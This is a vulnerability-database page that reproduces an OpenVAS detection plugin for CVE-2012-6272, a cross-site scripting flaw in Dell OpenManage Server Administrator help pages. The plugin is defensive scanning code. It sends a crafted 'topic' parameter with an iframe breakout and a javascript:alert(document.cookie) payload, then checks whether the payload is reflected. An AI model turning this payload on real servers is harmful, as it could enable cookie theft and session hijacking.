Lucene search
+L

Dell OpenManage Server Administrator Multiple XSS Vulnerabilities

🗓️ 30 Jan 2013 00:00:00Reported by Copyright (C) 2013 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 62 Views

Dell OpenManage Server Admin Multiple XSS Vulnerabilities, allows remote attackers to execute arbitrary HTML and script code, affecting versions 6.5.0.1, 7.0.0.1, and 7.1.0.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-6272
9 Jan 201300:00
circl
cve
CVE
CVE-2012-6272
25 Jan 201311:00
cve
cvelist
Cvelist
CVE-2012-6272
25 Jan 201311:00
cvelist
nessus
Tenable Nessus
Dell OpenManage Server Administrator index_main.htm DOM-based XSS
11 Jan 201300:00
nessus
exploitdb
Exploit DB
Dell OpenManage Server Administrator - Cross-Site Scripting
9 Jan 201300:00
exploitdb
euvd
EUVD
EUVD-2012-6127
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-6272
25 Jan 201312:00
nvd
prion
Prion
Cross site scripting
25 Jan 201312:00
prion
redhatcve
RedhatCVE
CVE-2012-6272
22 May 202512:13
redhatcve
cert
CERT
Dell OpenManage Server Administrator version 7.1.0.1 DOM-based XSS vulnerability
9 Jan 201300:00
cert
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.902941");
  script_version("2025-03-05T05:38:53+0000");
  script_cve_id("CVE-2012-6272");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_tag(name:"last_modification", value:"2025-03-05 05:38:53 +0000 (Wed, 05 Mar 2025)");
  script_tag(name:"creation_date", value:"2013-01-30 15:21:55 +0530 (Wed, 30 Jan 2013)");
  script_name("Dell OpenManage Server Administrator Multiple XSS Vulnerabilities");
  script_xref(name:"URL", value:"http://secunia.com/advisories/51764");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/57212");
  script_xref(name:"URL", value:"http://www.kb.cert.org/vuls/id/950172");
  script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/81158");

  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2013 Greenbone AG");
  script_family("Web application abuses");
  script_require_ports("Services/www", 1311);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");

  script_tag(name:"insight", value:"Input passed via the 'topic' parameter to

  - /help/sm/es/Output/wwhelp/wwhimpl/js/html/index_main.htm,

  - /help/sm/ja/Output/wwhelp/wwhimpl/js/html/index_main.htm,

  - /help/sm/de/Output/wwhelp/wwhimpl/js/html/index_main.htm,

  - /help/sm/fr/Output/wwhelp/wwhimpl/js/html/index_main.htm,

  - /help/sm/zh/Output/wwhelp/wwhimpl/js/html/index_main.htm,

  - /help/hip/en/msgguide/wwhelp/wwhimpl/js/html/index_main.htm and

  - /help/hip/en/msgguide/wwhelp/wwhimpl/common/html/index_main.htm is not
  properly sanitized before being returned to the user.");
  script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.");
  script_tag(name:"summary", value:"Dell OpenManage Server Administrator is prone to multiple cross site scripting vulnerabilities.");
  script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to execute
  arbitrary HTML and script code in a user's browser session in context of an
  affected site.");
  script_tag(name:"affected", value:"Dell OpenManage Server Administrator version 6.5.0.1, 7.0.0.1
  and 7.1.0.1");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"WillNotFix");

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");

port = http_get_port(default:1311);

req = http_get(item:"/servlet/OMSALogin?msgStatus=null", port:port);
res = http_keepalive_send_recv(port:port, data:req);

if(res && res =~ "^HTTP/1\.[01] 200" && ">Dell OpenManage <" >< res)
{
  url = '/help/sm/en/Output/wwhelp/wwhimpl/js/html/index_main.htm?topic="><' +
        '/iframe><iframe src="javascript:alert(document.cookie)';

  req = http_get(item:url, port:port);
  res = http_keepalive_send_recv(port:port, data:req);

  if(res && res =~ "^HTTP/1\.[01] 200" &&
     "javascript:alert(document.cookie)" >< res && "OMSS_Help" >< res){
    security_message(port:port);
    exit(0);
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation